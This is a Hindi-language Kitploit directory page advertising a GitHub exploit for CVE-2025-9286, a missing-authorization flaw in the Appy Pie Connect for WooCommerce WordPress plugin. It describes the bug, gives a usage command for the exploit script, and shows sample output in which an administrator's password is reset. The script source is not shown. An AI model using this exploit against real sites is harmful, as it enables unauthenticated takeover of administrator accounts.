Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-9286 — Appy Pie Connect for WooCommerce <= 1.1.2 - लापता प्राधिकरण से बिना प्रमाणीकरण के विशेषाधिकार वृद्धि | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2025-9286
विशेषाधिकार वृद्धिपासवर्ड हमलेशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubnxploited/cve-2025-9286

CVE-2025-9286

Appy Pie Connect for WooCommerce <= 1.1.2 - लापता प्राधिकरण से बिना प्रमाणीकरण के विशेषाधिकार वृद्धि

रिपॉजिटरी देखें
311 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-9286

Appy Pie Connect for WooCommerce <= 1.1.2 - अप्रमाणित विशेषाधिकार वृद्धि के लिए अनुपस्थित प्राधिकरण

⚠️ Appy Pie Connect for WooCommerce <= 1.1.2 - reset_user_password के माध्यम से अप्रमाणित विशेषाधिकार वृद्धि के लिए अनुपस्थित प्राधिकरण

📝 विवरण

WordPress के लिए Appy Pie Connect for WooCommerce प्लगइन, reset_user_password() REST हैंडलर के भीतर अनुपस्थित प्राधिकरण के कारण, 1.1.2 तक (और सहित) सभी संस्करणों में विशेषाधिकार वृद्धि की भेद्यता से ग्रस्त है।
यह अप्रमाणित हमलावरों को व्यवस्थापकों सहित किसी भी उपयोगकर्ता का पासवर्ड रीसेट करने में सक्षम बनाता है, जिससे उन्हें व्यवस्थापकीय पहुँच प्राप्त हो जाती है।

  • CVE: CVE-2025-9286
  • CVSS: 9.8 (गंभीर)

💻 एक्सप्लॉइट स्क्रिप्ट

निम्नलिखित एक्सप्लॉइट का उपयोग भेद्य प्लगइन संस्करण चलाने वाली WordPress साइटों के विरुद्ध CVE-2025-9286 का फायदा उठाने के लिए किया जा सकता है।

स्क्रिप्ट नाम: CVE-2025-9286.py

⚙️ उपयोग

root@kitploit:~
python CVE-2025-9286.py -u http://nxploit.ddev.site/ -id 1

🟢 नमूना आउटपुट (सफल शोषण)

root@kitploit:~
[+] Checking plugin version: http://nxploit.ddev.site/wp-content/plugins/appy-pie-connect-for-woocommerce/readme.txt
[!] Vulnerable plugin detected (1.1.2). Attempting exploitation...
[*] Please wait, attempting to change password...
[+] Exploit successful! Password has been reset.
[*] New password: Nxploited
[+] Vulnerability exploited and password changed successfully.

📬 संपर्क और समुदाय

  • 📨 टेलीग्राम: @Kxploit
  • 📡 टेलीग्राम चैनल: @KNxploited

⚠️ अस्वीकरण

यह एक्सप्लॉइट केवल शैक्षिक और अधिकृत पैठ परीक्षण उद्देश्यों के लिए है।
स्पष्ट अनुमति के बिना सिस्टम के विरुद्ध अनधिकृत उपयोग अवैध है।
इस टूल से होने वाले किसी भी दुरुपयोग या क्षति के लिए लेखक जिम्मेदार नहीं है।


द्वारा: Khaled Alenazi (Nxploited)

टूल डाउनलोड करें